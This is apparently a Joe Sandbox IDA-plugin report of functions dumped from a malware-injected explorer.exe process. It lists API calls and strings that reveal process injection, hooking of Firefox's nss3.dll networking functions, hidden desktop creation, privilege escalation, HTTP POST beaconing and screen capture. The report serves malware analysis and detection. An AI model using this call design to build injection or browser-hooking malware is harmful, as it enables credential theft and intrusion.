Part of subcall function 01B6835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 01B683B8

Part of subcall function 01B682E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 01B6831F

LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C2CC
EnterCriticalSection.KERNEL32(01B73FE4), ref: 01B6C2EB
LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C34D

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C376
EnterCriticalSection.KERNEL32(01B73FE4), ref: 01B6C395
LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C3DD

Strings

If-Modified-Since, xrefs: 01B6C20F
Accept-Encoding, xrefs: 01B6C1EB
identity, xrefs: 01B6C1DF

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B63048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 01B620C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01B62105
Part of subcall function 01B620C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B62172
Part of subcall function 01B620C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B621DB
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01B621FA
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01B6220C
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01B6221E
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01B62230
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01B62242
Part of subcall function 01B620C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01B62254
Part of subcall function 01B620C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01B6228D
Part of subcall function 01B620C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 01B6229C
Part of subcall function 01B620C4: InitializeCriticalSection.KERNEL32(01B7400C,?,?,00000000), ref: 01B622C9
Part of subcall function 01B620C4: WSAStartup.WS2_32(00000202,?), ref: 01B622DF
Part of subcall function 01B620C4: CreateEventW.KERNEL32(01B72C30,00000001,00000000,00000000,?,?,00000000), ref: 01B62300
Part of subcall function 01B620C4: GetLengthSid.ADVAPI32(00000000,000000FF,01B72C08,?,?,00000000), ref: 01B62335
Part of subcall function 01B620C4: GetCurrentProcessId.KERNEL32(00000000,08A4F7D0,00000000,?,?,00000000), ref: 01B62362

SetErrorMode.KERNEL32(00008007,00000000), ref: 01B6306F
GetCommandLineW.KERNEL32(?), ref: 01B63079
CommandLineToArgvW.SHELL32(00000000), ref: 01B63080
LocalFree.KERNEL32(00000000), ref: 01B630D5

Part of subcall function 01B5E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01B5E108
Part of subcall function 01B5E0FB: GetThreadDesktop.USER32(00000000), ref: 01B5E10F
Part of subcall function 01B5E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01B5E128

Part of subcall function 01B55BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C03
Part of subcall function 01B55BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C0A
Part of subcall function 01B55BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,01B630F6), ref: 01B55C1C
Part of subcall function 01B55BF6: SetEvent.KERNEL32(01B72868,?,00000001), ref: 01B55C69
Part of subcall function 01B55BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 01B55C76

Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DF87
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DF97
Part of subcall function 01B5DF74: TlsFree.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFA2
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFB0
Part of subcall function 01B5DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFBA
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFC7
Part of subcall function 01B5DF74: SelectObject.GDI32(00000000,00000000), ref: 01B5DFE1
Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DFF2
Part of subcall function 01B5DF74: DeleteDC.GDI32(00000000), ref: 01B5DFFF
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5E010
Part of subcall function 01B5DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B5E01F
Part of subcall function 01B5DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01B5E038

Part of subcall function 01B62B08: GetModuleHandleW.KERNEL32(?), ref: 01B62B1F
Part of subcall function 01B62B08: GetProcAddress.KERNEL32(00000000,?), ref: 01B62B41

Part of subcall function 01B62D01: CreateMutexW.KERNEL32(01B72C30,00000001,?,32901130,?,00000001,?), ref: 01B62D91
Part of subcall function 01B62D01: GetLastError.KERNEL32 ref: 01B62DA3
Part of subcall function 01B62D01: CloseHandle.KERNEL32(000001E6), ref: 01B62DBA
Part of subcall function 01B62D01: ExitWindowsEx.USER32(00000014,80000000), ref: 01B62DFD
Part of subcall function 01B62D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 01B62E1C
Part of subcall function 01B62D01: SetEvent.KERNEL32(00000000), ref: 01B62E29
Part of subcall function 01B62D01: CloseHandle.KERNEL32(00000000), ref: 01B62E30
Part of subcall function 01B62D01: CloseHandle.KERNEL32(000001E6), ref: 01B62E42
Part of subcall function 01B62D01: ReadProcessMemory.KERNEL32(000000FF,01B80014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 01B62EA6
Part of subcall function 01B62D01: Sleep.KERNEL32(000001F4), ref: 01B62EB8
Part of subcall function 01B62D01: IsWellKnownSid.ADVAPI32(08A4F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 01B62EC9
Part of subcall function 01B62D01: ReadProcessMemory.KERNEL32(000000FF,01B80014,00000000,00000001,00000000), ref: 01B62EF1
Part of subcall function 01B62D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 01B62F0D
Part of subcall function 01B62D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 01B62F50
Part of subcall function 01B62D01: CreateEventW.KERNEL32(01B72C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 01B62FCE
Part of subcall function 01B62D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B62FE7
Part of subcall function 01B62D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01B62FF7
Part of subcall function 01B62D01: CloseHandle.KERNEL32(0000000C), ref: 01B6300D
Part of subcall function 01B62D01: CloseHandle.KERNEL32(?), ref: 01B63013
Part of subcall function 01B62D01: CloseHandle.KERNEL32(?), ref: 01B63016

Sleep.KERNEL32(000000FF,?,00000001), ref: 01B6312B
ExitProcess.KERNEL32(00000000,00000000), ref: 01B6313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 01B63157

Part of subcall function 01B62542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01B62574
Part of subcall function 01B62542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625AB
Part of subcall function 01B62542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625CB
Part of subcall function 01B62542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01B6316D,?,00000000), ref: 01B6261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-036D5903,00000000,00000000,00000000), ref: 01B63185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 01B63198
CloseHandle.KERNEL32(?), ref: 01B631A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 01B631B5
CloseHandle.KERNEL32(00000000), ref: 01B631BC

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 01B5DF87
CloseHandle.KERNEL32(00000000), ref: 01B5DF97
TlsFree.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFA2
CloseHandle.KERNEL32(00000000), ref: 01B5DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFBA
CloseHandle.KERNEL32(00000000), ref: 01B5DFC7
SelectObject.GDI32(00000000,00000000), ref: 01B5DFE1
DeleteObject.GDI32(00000000), ref: 01B5DFF2
DeleteDC.GDI32(00000000), ref: 01B5DFFF
CloseHandle.KERNEL32(00000000), ref: 01B5E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B5E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01B5E038

Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DD9
Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DE2

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 01B64CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 01B64D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 01B64D19
CreateProcessAsUserW.ADVAPI32(?,00000000,01B6C8F5,00000000,00000000,00000000,01B6C8F5,01B6C8F5,00000000,?,?,?,00000000,00000044), ref: 01B64D8A
CloseHandle.KERNEL32(?), ref: 01B64D9D
CloseHandle.KERNEL32(?), ref: 01B64DA2
FreeLibrary.KERNEL32(?), ref: 01B64DB9

Strings

CreateEnvironmentBlock, xrefs: 01B64D07
userenv.dll, xrefs: 01B64CE6
DestroyEnvironmentBlock, xrefs: 01B64D0F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01B620A9), ref: 01B5C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01B620A9), ref: 01B5C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01B5C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01B5C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01B5C14C

Part of subcall function 01B5BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,01B5C160,01B72360), ref: 01B5BE72

Part of subcall function 01B6B58C: InitializeCriticalSection.KERNEL32(01B73FE4,76C61857,01B5C185,01B72360), ref: 01B6B5A2
Part of subcall function 01B6B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 01B6B5DE
Part of subcall function 01B6B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 01B6B5F0
Part of subcall function 01B6B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 01B6B602

Strings

PR_Write, xrefs: 01B5C141
PR_Close, xrefs: 01B5C127
nss3.dll, xrefs: 01B5C10C
PR_OpenTCPSocket, xrefs: 01B5C11F
PR_Read, xrefs: 01B5C134

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 01B5DCA2: GetClassNameW.USER32(01B801CA,?,00000101), ref: 01B5DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 01B55CB4
ResetEvent.KERNEL32(00000010), ref: 01B55D03
PostMessageW.USER32(?,?,?,00000010), ref: 01B55D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01B55D35

Part of subcall function 01B55B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 01B55B40
Part of subcall function 01B55B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01B55B9A
Part of subcall function 01B55B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01B55BD6
Part of subcall function 01B55B28: TerminateProcess.KERNEL32(?,00000000), ref: 01B55BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 01B55D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01B55D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01B55D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01B55DA7

Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DD9
Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DE2

IntersectRect.USER32(?,?), ref: 01B55DC7
FillRect.USER32(?,?,00000006), ref: 01B55DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01B55DED

Part of subcall function 01B67A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 01B67AB5

Part of subcall function 01B66B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,01B62E87,?,19367401,?,00000001,8889347B,00000002), ref: 01B66BA9
Part of subcall function 01B66B9E: CloseHandle.KERNEL32(00000000), ref: 01B66BB4

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 01B67AF0: WindowFromPoint.USER32(?,?), ref: 01B67B0C
Part of subcall function 01B67AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 01B67B3D
Part of subcall function 01B67AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 01B67B61
Part of subcall function 01B67AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01B67B72
Part of subcall function 01B67AF0: GetWindowLongW.USER32(?,000000F0), ref: 01B67B8F
Part of subcall function 01B67AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 01B67B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 01B5B6B6
GetParent.USER32(00000000), ref: 01B5B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 01B5B6FD
IsWindow.USER32(?), ref: 01B5B720

Part of subcall function 01B5B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B5B0B3
Part of subcall function 01B5B0AD: ReleaseMutex.KERNEL32(?), ref: 01B5B0E7
Part of subcall function 01B5B0AD: IsWindow.USER32(?), ref: 01B5B0EE
Part of subcall function 01B5B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 01B5B108
Part of subcall function 01B5B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 01B5B110

GetWindowInfo.USER32(00000000,?), ref: 01B5B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 01B5B8AD

Part of subcall function 01B5B31C: GetAncestor.USER32(?,00000002), ref: 01B5B345
Part of subcall function 01B5B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 01B5B370
Part of subcall function 01B5B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 01B5B3B2
Part of subcall function 01B5B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 01B5B448
Part of subcall function 01B5B31C: PostMessageW.USER32(?,00000112,?,?), ref: 01B5B49B
Part of subcall function 01B5B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 01B5B4DA

Part of subcall function 01B5DCA2: GetClassNameW.USER32(01B801CA,?,00000101), ref: 01B5DCBD

Part of subcall function 01B5B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B5B130
Part of subcall function 01B5B11C: ReleaseMutex.KERNEL32(?), ref: 01B5B14F
Part of subcall function 01B5B11C: GetWindowRect.USER32(?,?), ref: 01B5B15C
Part of subcall function 01B5B11C: IsRectEmpty.USER32(?), ref: 01B5B1E0
Part of subcall function 01B5B11C: GetWindowLongW.USER32(?,000000F0), ref: 01B5B1EF
Part of subcall function 01B5B11C: GetParent.USER32(?), ref: 01B5B205
Part of subcall function 01B5B11C: MapWindowPoints.USER32(00000000,00000000), ref: 01B5B20E
Part of subcall function 01B5B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 01B5B232

Strings

<, xrefs: 01B5B769
, xrefs: 01B5B654
@, xrefs: 01B5B806

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 01B6D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 01B6D89D
GetProcessWindowStation.USER32 ref: 01B6D8AE

Part of subcall function 01B6D83D: GetProcessWindowStation.USER32 ref: 01B6D841
Part of subcall function 01B6D83D: SetProcessWindowStation.USER32(00000000), ref: 01B6D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 01B6D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 01B6D8FD
GetCurrentThreadId.KERNEL32(?,?,?,01B5731A,?,2937498D,?,00000000), ref: 01B6D909
GetThreadDesktop.USER32(00000000), ref: 01B6D910

Part of subcall function 01B6D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,01B6D84D,00000000,?,?,?,01B5731A,?,2937498D,?), ref: 01B6D81D

SetThreadDesktop.USER32(00000000), ref: 01B6D922
CloseDesktop.USER32(00000000), ref: 01B6D934
CloseWindowStation.USER32(?), ref: 01B6D94F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 01B6C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8), ref: 01B6C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?), ref: 01B6C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?), ref: 01B6C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?,00000000), ref: 01B6CA0D

Part of subcall function 01B64A87: GetCurrentThread.KERNEL32(00000020,00000000,01B6C9A1,00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A97
Part of subcall function 01B64A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A9E
Part of subcall function 01B64A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01B6C9A1,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64AB0
Part of subcall function 01B64A87: LookupPrivilegeValueW.ADVAPI32(00000000,01B6C9A1,?), ref: 01B64AD4
Part of subcall function 01B64A87: AdjustTokenPrivileges.ADVAPI32(01B6C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01B64AE9
Part of subcall function 01B64A87: GetLastError.KERNEL32 ref: 01B64AF3
Part of subcall function 01B64A87: CloseHandle.KERNEL32(01B6C9A1), ref: 01B64B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,01B6D2A8,?,?,00000000), ref: 01B6C9A1

Part of subcall function 01B6C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,01B6C9FB,00000000,?,?,?), ref: 01B6C8C6
Part of subcall function 01B6C8A1: CloseHandle.KERNEL32(?), ref: 01B6C907

Strings

SeTcbPrivilege, xrefs: 01B6C997
.exe, xrefs: 01B6C93B

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B650A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(00000003,POST,00000000,HTTP/1.1,00000000,01B72000,8404F700,00000000), ref: 01B650EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 01B65112
HttpQueryInfoA.WININET(00000000,20000013,00000000,00000000,00000000), ref: 01B65137
InternetCloseHandle.WININET(00000000), ref: 01B6514F

Strings

GET, xrefs: 01B650D0, 01B650E7
Connection: close, xrefs: 01B65103, 01B65110
HTTP/1.1, xrefs: 01B650DF
POST, xrefs: 01B650C9

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6BD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

EnterCriticalSection.KERNEL32(01B73FE4), ref: 01B6BDB7
LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6BDE5
EnterCriticalSection.KERNEL32(01B73FE4), ref: 01B6BE09

Part of subcall function 01B614C3: InternetCrackUrlA.WININET ref: 01B617AC
Part of subcall function 01B614C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01B617CA
Part of subcall function 01B614C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01B618E4
Part of subcall function 01B614C3: EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61910
Part of subcall function 01B614C3: LeaveCriticalSection.KERNEL32(01B72AC8,?,?), ref: 01B6194D

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

Part of subcall function 01B6835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 01B683B8

Part of subcall function 01B640F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 01B6410D

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

LeaveCriticalSection.KERNEL32(01B73FE4,00000000,?,00000000), ref: 01B6C04C

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C06B
LeaveCriticalSection.KERNEL32(01B73FE4), ref: 01B6C078

Strings

%x, xrefs: 01B6BF11
0, xrefs: 01B6BF31
Content-Length, xrefs: 01B6BF55

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B59489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 01B594EF

Part of subcall function 01B5929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01B592D4
Part of subcall function 01B5929D: StrStrIW.SHLWAPI(?,?), ref: 01B5935C
Part of subcall function 01B5929D: StrStrIW.SHLWAPI(?,?), ref: 01B5936D
Part of subcall function 01B5929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B59389
Part of subcall function 01B5929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01B593A7
Part of subcall function 01B5929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B593C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 01B5950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 01B59582

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 01B5961F

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

&, xrefs: 01B59560
#, xrefs: 01B59567
$, xrefs: 01B59552

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 01B6B053

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

EnterCriticalSection.KERNEL32(01B73FB4), ref: 01B6AF36
LeaveCriticalSection.KERNEL32(01B73FB4), ref: 01B6AFD9

Part of subcall function 01B5EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 01B5EA43
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 01B5EA54
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 01B5EA61
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 01B5EA6E
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 01B5EA7B
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 01B5EA88
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 01B5EA95
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 01B5EAA2
Part of subcall function 01B5EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 01B5EAEA
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 01B5EAF5
Part of subcall function 01B5EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 01B5EB07
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 01B5EB12
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 01B5EB1E
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 01B5EB2B
